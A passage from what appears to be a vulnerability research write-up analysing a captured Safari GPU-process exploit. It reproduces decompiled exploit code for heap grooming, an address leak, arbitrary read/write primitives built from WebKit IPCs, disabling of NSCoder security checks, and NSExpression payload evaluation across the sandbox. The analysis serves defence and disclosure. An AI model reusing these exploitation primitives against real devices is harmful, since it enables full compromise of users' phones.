m,\n\nWTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88)\n\nwrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:\n\nvoid* wrap_remote_buffer_unmap(int64 dst, int64 arg)\n\n{\n\nint64 b[5];\n\nb[0] = 0x7F6F3229LL;\n\nb[1] = 0LL;\n\nb[2] = 0LL;\n\nb[3] = 0xFFFFLL;\n\nb[4] = arg;\n\nreturn IPC_RemoteBuffer_Unmap(dst, b, 40LL);\n\n}\n\nThe arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O, it points to the global variable used here:\n\nint64 WTF::ObjectIdentifierBase::generateIdentifierInternal()\n\n{\n\nreturn ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;\n\n}\n\nAs the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function.) The value passed in the Unmap IPC points 0x88 below the address of ::current.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAww3z050R_dVijQpVdfLcavJy3a5fGpg6kDk71PjQW4okhHen7EdNUndSHT9Qxq_OAzC71ZMSGBbI-BmxX8p-6keXghnEPSLAGGdOCRL27fgLLgF0GjM0YtFbQro87p1HMuZvJ3sns87tRYRWbhGWFlLNxK11xcnfp6aKRtlmgXBlu_0jEoynRm1q0Ys/s548/image3.png>)\n\nIf the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.\n\n### IPC 3 - DrawNativeImage\n\nfor ( n = 0; n &lt; 0x22; ++n ) {\n\nif (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {\n\ncontinue\n\n}\n\nIPC_RemoteDisplayListRecorder_DrawNativeImage(\n\nimage_buffer_base_id + n,// potentially corrupted target\n\nimage_buffer_base_id + 34LL);\n\nThe exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them had their associated QueueSlab structure corrupted. The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.\n\nLet's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:\n\nvoid RemoteDisplayListRecorder::drawNativeImage(\n\nRenderingResourceIdentifier imageIdentifier,\n\nconst FloatSize&amp; imageSize,\n\nconst FloatRect&amp; destRect,\n\nconst FloatRect&amp; srcRect,\n\nconst ImagePaintingOptions&amp; options)\n\n{\n\ndrawNativeImageWithQualifiedIdentifier(\n\n{imageIdentifier, m_webProcessIdentifier},\n\nimageSize,\n\ndestRect,\n\nsrcRect,\n\noptions);\n\n}\n\nThis immediately calls through to:\n\nvoid\n\nRemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(\n\nQualifiedRenderingResourceIdentifier imageIdentifier,\n\nconst FloatSize&amp; imageSize,\n\nconst FloatRect&amp; destRect,\n\nconst FloatRect&amp; srcRect,\n\nconst ImagePaintingOptions&amp; options)\n\n{\n\nRefPtr image = resourceCache().cachedNativeImage(imageIdentifier);\n\nif (!image) {\n\nASSERT_NOT_REACHED();\n\nreturn;\n\n}\n\nhandleItem(DisplayList::DrawNativeImage(\n\nimageIdentifier.object(),\n\nimageSize,\n\ndestRect, \n\nsrcRect, \n\noptions),\n\n*image);\n\n}\n\nimageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier. Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):\n\nvoid\n\nRemoteRenderingBackend::cacheNativeImage(\n\nconst ShareableBitmap::Handle&amp; handle,\n\nRenderingResourceIdentifier nativeImageResourceIdentifier)\n\n{\n\ncacheNativeImageWithQualifiedIdentifier(\n\nhandle,\n\n{nativeImageResourceIdentifier,\n\nm_gpuConnectionToWebProcess-&gt;webProcessIdentifier()}\n\n);\n\n}\n\nvoid\n\nRemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(\n\nconst ShareableBitmap::Handle&amp; handle,\n\nQualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)\n\n{\n\nauto bitmap = ShareableBitmap::create(handle);\n\nif (!bitmap)\n\nreturn;\n\nauto image = NativeImage::create(\n\nbitmap-&gt;createPlatformImage(\n\nDontCopyBackingStore,\n\nShouldInterpolate::Yes), \n\nnativeImageResourceIdentifier.object());\n\nif (!image)\n\nreturn;\n\nm_remoteResourceCache.cacheNativeImage(\n\nimage.releaseNonNull(),\n\nnativeImageResourceIdentifier);\n\n}\n\nThis NativeImage object is allocated by the default system malloc.\n\nReturning to the DrawNativeImage flow we reach this:\n\nvoid DrawNativeImage::apply(GraphicsContext&amp; context, NativeImage&amp; image) const\n\n{\n\ncontext.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);\n\n}\n\nThe context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:\n\nvoid GraphicsContextCG::drawNativeImage(NativeImage&amp; nativeImage, const FloatSize&amp; imageSize, const FloatRect&amp; destRect, const FloatRect&amp; srcRect, const ImagePaintingOptions&amp; options)\n\nThis ends up calling:\n\nCGContextDrawImage(context, adjustedDestRect, subImage.get());\n\nWhich calls CGContextDrawImageWithOptions.\n\nThrough a few more levels of indirection in the CoreGraphics library this eventually reaches:\n\nint64 CA::CG::ContextDelegate::draw_image_(\n\nint64 delegate,\n\nint64 a2,\n\nint64 a3,\n\nCGImage *image...) {\n\n...\n\nalloc_from_slab = CA::CG::Queue::alloc(queue, 160);\n\nif (alloc_from_slab)\n\nCA::CG::DrawImage::DrawImage(\n\nalloc_from_slab,\n\nInfo_2,\n\na2, \n\na3, \n\nFillColor_2, \n\n&amp;v18, \n\nAlternateImage_0);\n\nVia the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. They then make a 160 byte allocation from the corrupted queue slab.\n\nvoid*\n\nCA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)\n\n{\n\nuint64_t buffer*;\n\n...\n\nsize_rounded = (size + 31) &amp; 0xFFFFFFFFFFFFFFF0LL;\n\ncurrent_slab = q-&gt;current_slab;\n\nif ( !current_slab )\n\ngoto alloc_slab;\n\nif ( !q-&gt;c || current_slab-&gt;remaining_size &gt;= size_rounded )\n\ngoto GOT_ENOUGH_SPACE;\n\n...\n\nGOT_ENOUGH_SPACE:\n\nremaining_size = current_slab-&gt;remaining_size;\n\nnew_remaining = remaining_size - size_requested_rounded;\n\nif ( remaining_size &gt;= size_requested_rounded )\n\n{\n\nbuffer = current_slab-&gt;end;\n\ncurrent_slab-&gt;remaining_size = new_remaining;\n\ncurrent_slab-&gt;end = buffer + size_rounded;\n\ngoto RETURN_ALLOC;\n\n...\n\nRETURN_ALLOC:\n\nbuffer[0] = size_rounded;\n\natomic_fetch_add(q-&gt;alloc_meta);\n\nbuffer[1] = q-&gt;alloc_meta\n\n...\n\nreturn &amp;buffer[2];\n\n}\n\nWhen CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining so proceeds to write a 0x10 byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10. This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.\n\ndraw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument.)\n\nint64 CA::CG::DrawImage::DrawImage(\n\nint64 slab_buf,\n\nint64 a2,\n\nint64 a3,\n\nint64 a4,\n\nint64 a5,\n\nOWORD *a6,\n\nCGImage *img)\n\n{\n\n...\n\n(slab_buf + 0x78) = CGImageRetain(img);\n\nDrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which happens now to exactly overlap WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.\n\n### IPC 4 - CreateCDM\n\nThe final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:\n\ninteresting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();\n\nIf the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object.\n\n### Over and over - arbitrary read\n\nThe next stage is to build an arbitrary read primitive, this time using 5 IPCs:\n\n 1. MapAsync \\- sets up the destination pointer for the overflow\n 2. Unmap \\- performs the overflow, corrupting queue metadata\n 3. SetCTM \\- sets up parameters\n 4. FillRect \\- writes the parameters through a controlled pointer\n 5. CreateRecorder \\- returns data read from an arbitrary address \n\n### Arbitrary read IPC 1 &amp; 2: MapAsync/Unmap\n\nMapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:\n\nWebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl\n\nSpecifically, that symbol is the constant StringImpl object for the \"audio/mp4\" string returned by reference from this function:\n\nconst String&amp;\n\nMediaRecorderPrivateWriter::mimeType() const {\n\nstatic NeverDestroyed&lt;const String&gt;\n\naudioMP4(MAKE_STATIC_STRING_IMPL(\"audio/mp4\"));\n\nstatic NeverDestroyed&lt;const String&gt;\n\nvideoMP4(MAKE_STATIC_STRING_IMPL(\"video/mp4\"));\n\nreturn m_hasVideo ? videoMP4 : audioMP4;\n\n}\n\nConcretely this is a StringImplShape object with this layout:\n\nclass STRING_IMPL_ALIGNMENT StringImplShape {\n\nunsigned m_refCount;\n\nunsigned m_length;\n\nunion {\n\nconst LChar* m_data8;\n\nconst UChar* m_data16;\n\nconst char* m_data8Char;\n\nconst char16_t* m_data16Char;\n\n};\n\nmutable unsigned m_hashAndFlags;\n\n};\n\n### Arbitrary read IPC 3: SetCTM\n\nThe next IPC is RemoteDisplayListRecorder::SetCTM:\n\nmessages -&gt; RemoteDisplayListRecorder NotRefCounted Stream {\n\n...\n\nSetCTM(WebCore::AffineTransform ctm) StreamBatched\n\n...\n\nCTM is the \"Current Transform Matrix\" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.\n\nThe exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:\n\nIPC_RemoteDisplayListRecorder_SetCTM(\n\ncandidate_corrupted_target_image_buffer_id,\n\n(read_this_much &lt;&lt; 32) | 0x100,\n\nread_from_here);\n\nThe wrapper passes those two 64-bit values as the first two \"doubles\" in the IPC. On the receiver side the implementation doesn't do much apart from directly store those affine transform parameters into the CGContext's CGState object:\n\nvoid\n\nsetCTM(const WebCore::AffineTransform&amp; transform) final\n\n{\n\nGraphicsContextCG::setCTM(\n\nm_inverseImmutableBaseTransform * transform);\n\n}\n\nvoid\n\nGraphicsContextCG::setCTM(const AffineTransform&amp; transform)\n\n{\n\nCGContextSetCTM(platformContext(), transform);\n\nm_data-&gt;setCTM(transform);\n\nm_data-&gt;m_userToDeviceTransformKnownToBeIdentity = false;\n\n}\n\nReversing CGContextSetCTM we see that the transform is just stored into a 0x30 byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):\n\n188B55CD4 EXPORT _CGContextSetCTM \n\n188B55CD4 MOV X8, X0\n\n188B55CD8 CBZ X0, loc_188B55D0C\n\n188B55CDC LDR W9, [X8,#0x10]\n\n188B55CE0 MOV W10, #'CTXT'\n\n188B55CE8 CMP W9, W10\n\n188B55CEC B.NE loc_188B55D0C\n\n188B55CF0 LDR X8, [X8,#0x60]\n\n188B55CF4 LDP Q0, Q1, [X1]\n\n188B55CF8 LDR Q2, [X1,#0x20]\n\n188B55CFC STUR Q2, [X8,#0x38]\n\n188B55D00 STUR Q1, [X8,#0x28]\n\n188B55D04 STUR Q0, [X8,#0x18]\n\n188B55D08 RET\n\n### Arbitrary read IPC 4: FillRect\n\nThis IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab with the value returned by CA::CG::Queue::alloc this time now pointing 8 bytes below the \"audio/mp4\" StringImpl. FillRect eventually reaches this code \n\nCA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);\n\n...\n\nCTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGGState);\n\nv13 = CTM_2[1];\n\nv12 = CTM_2[2];\n\n*(_OWORD *)(slab_ptr + 8) = *CTM_2;\n\n*(_OWORD *)(slab_ptr + 0x18) = v13;\n\n*(_OWORD *)(slab_ptr + 0x28) = v12;\n\n\u2026which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.\n\n### Arbitrary read IPC 5: CreateRecorder\n\nmessages -&gt; RemoteMediaRecorderManager NotRefCounted {\n\nCreateRecorder(\n\nWebKit::MediaRecorderIdentifier id,\n\nbool hasAudio,\n\nbool hasVideo,\n\nstruct WebCore::MediaRecorderPrivateOptions options)\n\n-&gt;\n\n( std::optional&lt;WebCore::ExceptionData&gt; creationError,\n\nString mimeType,\n\nunsigned audioBitRate,\n\nunsigned videoBitRate)\n\nReleaseRecorder(WebKit::MediaRecorderIdentifier id)\n\n}\n\nThe CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.\n\n### What to read?\n\nRecall that the cacheNativeImage operation was sandwiched between the allocation of 400 RemoteBuffer objects via the RemoteDevice::CreateBuffer IPC.\n\nNote that earlier (for the MapAsync/Unmap corruption) it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object which is the wrapper object which points to those backing pages. These are also allocated by during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default (\"scalable\") zone. [@elvanderb](<https://twitter.com/elvanderb>) covered the operation of this heap allocator in their [\"Heapple Pie\" presentation](<https://www.synacktiv.com/ressources/Sthack_2018_Heapple_Pie.pdf>). Provided that the targeted allocation size's freelist is empty this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.\n\nThey use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage and they search for a pointer to the AGXG15FamilyBuffer Objective-C isa pointer (masking out any PAC bits):\n\nfor ( ii = 0; ii &lt; 0x1800; ++ii ) { \n\nif ( ((leaker_buffer_contents[ii] &gt;&gt; 8) &amp; 0xFFFFFFFF0LL) ==\n\n(AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer &amp; 0xFFFFFFFF0LL) )\n\n...\n\n### What to write?\n\nIf the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to..\n\nThey use the same Map/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.\n\nLooking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.\n\n@interface IOGPUMetalResource : _MTLResource &lt;MTLResourceSPI&gt; {\n\nIOGPUMetalResource* _res;\n\nIOGPUMetalResource* next;\n\nIOGPUMetalResource* prev;\n\nunsigned long long uniqueId;\n\n}\n\n@property (readonly) _IOGPUResource* resourceRef; \n\n@property (nonatomic,readonly) void* virtualAddress; \n\n@property (nonatomic,readonly) unsigned long long gpuAddress; \n\n@property (nonatomic,readonly) unsigned resourceID; \n\n@property (nonatomic,readonly) unsigned long long resourceSize; \n\n@property (readonly) unsigned long long cpuCacheMode; \n\nI mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:\n\nreturn static_cast&lt;char*&gt;(m_buffer.contents) + offset;\n\nDot syntax in Objective-C is syntactic sugar around calling an accessor method and the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:\n\nvoid* -[IOGPUMetalBuffer contents]\n\nB _objc_msgSend$virtualAddress_1 \n\n\n[IOGPUMetalResource virtualAddress]\n\nADRP X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE\n\nLDRSW X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18\n\nADD X8, X0, X8\n\nLDR X0, [X8,#0x80]\n\nRET\n\nThey then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:\n\nfor ( jj = 200; jj &lt; 400; ++jj )\n\n{\n\nsentinel = 0x3A30DD9DLL;\n\nIPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);\n\nIPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &amp;sentinel, 8LL);\n\nsemaphore_signal(semaphore_a);\n\nCDM = IPC_RemoteCDMFactoryProxy_CreateCDM();\n\nif ( CDM &gt;= 0x3A30DD9E &amp;&amp; CDM &lt;= 0x3A30DF65 ) {\n\n...\n\nAfter each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!\n\nThey store this id and use it to build their final arbitrary write primitive with 6 IPCs:\n\narbitrary_write(u64 ptr, u64 value_ptr, u64 size) {\n\nIPC_RemoteBuffer_MapAsync(\n\nremote_device_buffer_id_base + index_of_corruptor,\n\n0x4000LL, 0LL);\n\nwrap_remote_buffer_unmap(\n\nremote_device_buffer_id_base + index_of_corruptor,\n\nagxg15familybuffer_plus_0x80);\n\nIPC_RemoteDisplayListRecorder_SetCTM(\n\ncandidate_corrupted_target_image_buffer_id,\n\nptr,\n\n0LL);\n\nIPC_RemoteDisplayListRecorder_FillRect(\n\ncandidate_corrupted_target_image_buffer_id);\n\nIPC_RemoteBuffer_MapAsync(\n\ndevice_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);\n\nIPC_RemoteBuffer_Unmap(\n\ndevice_id_with_corrupted_backing_buffer_ptr, value_ptr, size);\n\n}\n\nThe first MapAsync/Unmap corrupt the original QueueSlab to point the buffer pointer to 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.\n\nSetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.\n\nThe final MapAsync/Unmap pair then write through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.\n\n### Mitigating mitigations\n\nAt this point the attackers have an arbitrary read/write primitive - it's surely game over. But never-the-less, the most fascinating parts of this exploit are still to come.\n\nRemember, they are seeking not just to exploit this vulnerability; they are really seeking to minimize the overall cost of successfully exploiting as many full exploit chains as possible with the lowest marginal cost. This is typically done using custom frameworks which permit code-reuse across exploits. In this case the goal is to use some resources (IOKit userclients) which only the GPU Process has access to, but this is done in a very generic way using a custom framework requiring only a few arbitrary writes to kick off.\n\n* * *\n\n### What's old is new again - NSArchiver\n\nThe [FORCEDENTRY sandbox escape exploit](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first. \n\nAs part of the fix for that issue [Apple introduced various hardening measures](<https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-15_1-release-notes>) intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.\n\nThe functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...\n\n### Flipping bits\n\nUsing the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.\n\nThey also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.\n\n### Forcing Entry\n\nWe've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?\n\nAs we observed in the ForcedEntry writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In ForcedEntry it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a potentially unexpected huge extra attack surface: NSKeyedArchiver. It turns out, you can get NSKeyedArchiver objects serialized and deserialized across a Safari IPC boundary, specifically using this IPC:\n\nRedirectReceived(\n\nWebKit::RemoteMediaResourceIdentifier identifier, \n\nWebCore::ResourceRequest request,\n\nWebCore::ResourceResponse response)\n\n-&gt;\n\n(WebCore::ResourceRequest returnRequest)\n\nThis IPC takes two arguments:\n\nWebCore::ResourceRequest request\n\nWebCore::ResourceResponse response\n\nLet's look at the ResourceRequest deserialization code:\n\nbool\n\nArgumentCoder&lt;ResourceRequest&gt;::decode(\n\nDecoder&amp; decoder,\n\nResourceRequest&amp; resourceRequest)\n\n{\n\nbool hasPlatformData;\n\nif (!decoder.decode(hasPlatformData))\n\nreturn false;\n\nbool decodeSuccess = \n\nhasPlatformData ?\n\ndecodePlatformData(decoder, resourceRequest)\n\n:\n\nresourceRequest.decodeWithoutPlatformData(decoder);\n\nThat in turn calls:\n\nbool\n\nArgumentCoder&lt;WebCore::ResourceRequest&gt;::decodePlatformData(\n\nDecoder&amp; decoder,\n\nWebCore::ResourceRequest&amp; resourceRequest)\n\n{\n\nbool requestIsPresent;\n\nif (!decoder.decode(requestIsPresent))\n\nreturn false;\n\nif (!requestIsPresent) {\n\nresourceRequest = WebCore::ResourceRequest();\n\nreturn true;\n\n}\n\nauto request = IPC::decode&lt;NSURLRequest&gt;(\n\ndecoder, NSURLRequest.class);\n\nThat last line decoding request looks slightly different to the others - rather than calling decoder.decoder() passing the field to decode by reference they're explicitly typing the field here in the template invocation, which takes a different decoder path:\n\n\u200b\u200btemplate&lt;typename T, typename&gt;\n\nstd::optional&lt;RetainPtr&lt;T&gt;&gt; decode(\n\nDecoder&amp; decoder, Class allowedClass)\n\n{\n\nreturn decode&lt;T&gt;(decoder, allowedClass ? \n\n@[ allowedClass ] : @[ ]);\n\n}\n\n(note the @[] syntax defines an Objective-C array literal so this is creating an array with a single entry)\n\nThis then calls:\n\ntemplate&lt;typename T, typename&gt;\n\nstd::optional&lt;RetainPtr&lt;T&gt;&gt; decode(\n\nDecoder&amp; decoder, NSArray&lt;Class&gt; *allowedClasses)\n\n{\n\nauto result = decodeObject(decoder, allowedClasses);\n\nif (!result)\n\nreturn std::nullopt;\n\nASSERT(!*result ||\n\nisObjectClassAllowed((*result).get(), allowedClasses));\n\nreturn { *result };\n\n}\n\nThis continues on to a different argument decoder implementation than the one we've seen so far:\n\nstd::optional&lt;RetainPtr&lt;id&gt;&gt;\n\ndecodeObject(\n\nDecoder&amp; decoder,\n\nNSArray&lt;Class&gt; *allowedClasses)\n\n{\n\nbool isNull;\n\nif (!decoder.decode(isNull))\n\nreturn std::nullopt;\n\nif (isNull)\n\nreturn { nullptr };\n\nNSType type;\n\nif (!decoder.decode(type))\n\nreturn std::nullopt;\n\nIn this case, rather than knowing the type to decode upfront they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:\n\nswitch (type) {\n\ncase NSType::Array:\n\nreturn decodeArrayInternal(decoder, allowedClasses);\n\ncase NSType::Color:\n\nreturn decodeColorInternal(decoder);\n\ncase NSType::Dictionary:\n\nreturn decodeDictionaryInternal(decoder, allowedClasses);\n\ncase NSType::Font:\n\nreturn decodeFontInternal(decoder);\n\ncase NSType::Number:\n\nreturn decodeNumberInternal(decoder);\n\ncase NSType::SecureCoding:\n\nreturn decodeSecureCodingInternal(decoder, allowedClasses);\n\ncase NSType::String:\n\nreturn decodeStringInternal(decoder);\n\ncase NSType::Date:\n\nreturn decodeDateInternal(decoder);\n\ncase NSType::Data:\n\nreturn decodeDataInternal(decoder);\n\ncase NSType::URL:\n\nreturn decodeURLInternal(decoder);\n\ncase NSType::CF:\n\nreturn decodeCFInternal(decoder);\n\ncase NSType::Unknown:\n\nbreak;\n\n}\n\n \nIn this case they choose type 7, which corresponds to NSType::SecureCoding, decoded by calling decodeSecureCodingInternal which allocates an NSKeyedUnarchiver initialized with data from the IPC message:\n\nauto unarchiver =\n\nadoptNS([[NSKeyedUnarchiver alloc]\n\ninitForReadingFromData:\n\nbridge_cast(data.get()) error:nullptr]);\n\nThe code adds a few more classes to the allow-list to be decoded:\n\nauto allowedClassSet =\n\nadoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);\n\n[allowedClassSet addObject:WKSecureCodingURLWrapper.class];\n\n[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];\n\nif ([allowedClasses containsObject:NSAttributedString.class]) {\n\n[allowedClassSet\n\nunionSet:NSAttributedString.allowedSecureCodingClasses];\n\n}\n\nthen unarchives the object:\n\nid result =\n\n[unarchiver decodeObjectOfClasses:\n\nallowedClassSet.get() \n\nforKey:\n\nNSKeyedArchiveRootObjectKey];\n\nThe serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:\n\n\\- (instancetype)initWithCoder:(NSCoder *)coder\n\n{\n\nauto selfPtr = adoptNS([super initWithString:@\"\"]);\n\nif (!selfPtr)\n\nreturn nil;\n\nBOOL hasBaseURL;\n\n[coder decodeValueOfObjCType:\"c\"\n\nat:&amp;hasBaseURL\n\nsize:sizeof(hasBaseURL)];\n\nRetainPtr&lt;NSURL&gt; baseURL;\n\nif (hasBaseURL)\n\nbaseURL =\n\n(NSURL *)[coder decodeObjectOfClass:NSURL.class \n\nforKey:baseURLKey];\n\n...\n\n}\n\nThis in turn decodes an NSURL, which decodes an NSString member named \"NS.relative\". The attacker object passes a subclass of NSString which is _NSLocalizedString which sets up the following allow-list:\n\nv10 = objc_opt_class_385(&amp;OBJC_CLASS___NSDictionary);\n\nv11 = objc_opt_class_385(&amp;OBJC_CLASS___NSArray);\n\nv12 = objc_opt_class_385(&amp;OBJC_CLASS___NSNumber);\n\nv13 = objc_opt_class_385(&amp;OBJC_CLASS___NSString);\n\nv14 = objc_opt_class_385(&amp;OBJC_CLASS___NSDate);\n\nv15 = objc_opt_class_385(&amp;OBJC_CLASS___NSData);\n\nv17 = objc_msgSend_setWithObjects__0(&amp;OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);\n\nv20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR(\"NS.configDict\"));\n\nThey then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):\n\n-[NSSharedKeyDictionary initWithCoder:]\n\n...\n\nv6 = objc_opt_class_388(&amp;OBJC_CLASS___NSSharedKeySet);\n\n...\n\nv11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR(\"NS.skkeyset\"));\n\nNSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.\n\nBut recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! Which means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in ForcedEntry of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!\n\n* * *\n\n### Part II - Data Is All You Need\n\nNSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:\n\nNSPredicateOperator_\n\nNSRightExpression_\n\nNSLeftExpression\n\nNSComparisonPredicate[NSPredicate\n\n^NSSelectorNameYNSOperand[NSArguments\n\nNSFunctionExpression\\NSExpression\n\nNSConstantValue\n\nNSConstantValueExpressionTself\n\n\\NSCollection\n\nNSAggregateExpression\n\nThere are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:\n\nsyscallInvocation\n\nmanipulating locks:\n\nos_unfair_unlock_0x34\n\n%os_unfair_lock_0x34InvocationInstance\n\nspinning up threads:\n\n.detachNewThreadWithBlock:_NSFunctionExpression\n\ndetachNewThreadWithBlock:\n\n!NSThread_detachNewThreadWithBlock\n\nXNSThread\n\n3NSThread_detachNewThreadWithBlockInvocationInstance\n\n6NSThread_detachNewThreadWithBlockInvocationInstanceIMP\n\npthreadinvocation\n\npthread____converted\n\nyWpthread\n\npthread_nextinvocation\n\npthread_next____converted\n\nand sending and receiving mach messages:\n\nmach_msg_sendInvocation\n\nmach_msg_receive____converted\n\nmach_make_memory_entryInvocation\n\nmach_make_memory_entry\n\n#mach_make_memory_entryInvocationIMP\n\nas well as interacting with IOKit:\n\nIOServiceMatchingInvocation\n\nIOServiceMatching\n\nIOServiceMatchingInvocationIMP\n\nIn addition to these strings there are also three fairly large chunks of javascript source which also look fairly suspicious:\n\nvar change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var 